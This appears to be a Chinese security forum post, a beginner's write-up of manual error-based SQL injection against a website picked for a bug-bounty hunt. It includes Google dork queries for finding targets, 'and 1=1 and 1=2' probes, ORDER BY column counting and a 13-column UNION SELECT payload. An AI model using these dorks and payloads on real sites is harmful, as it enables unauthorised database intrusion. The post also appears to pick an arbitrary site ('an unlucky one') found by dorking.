萌新记录一次src某网站的显错注入
前面挖了几次都是 and 1=1 and 1=2 报错的话就直接丢sqlmap跑 (其实是手动没做出来)
这次手动做,靶场的做法一样
通过谷歌语法找网站
地区+inurl:asp?id=50
地区+inurl:php?id=50
地区+inurl:”type_id=1
选中一个倒霉蛋开始
在id=2后面插入 and 1=1 and 1=2 发现报错
有注入,用显错注入
id=2 and 1=1 order by 13 一直到14不报错 那就是13 了
开始联合查询 id=1 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| xiaozhu7719 | 3.00 | 0 | 2021-09-26 15:03:39 | 一个受益终生的帖子~~ |
| xiaozhu7719 | 1.00 | 0 | 2021-09-26 15:03:19 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
登录后才可发表内容
返回:技术文章投稿区
实战纪实
xiaozhu7719
发表于 2021-9-26
看你的居然看懂了哈哈
评论列表
加载数据中...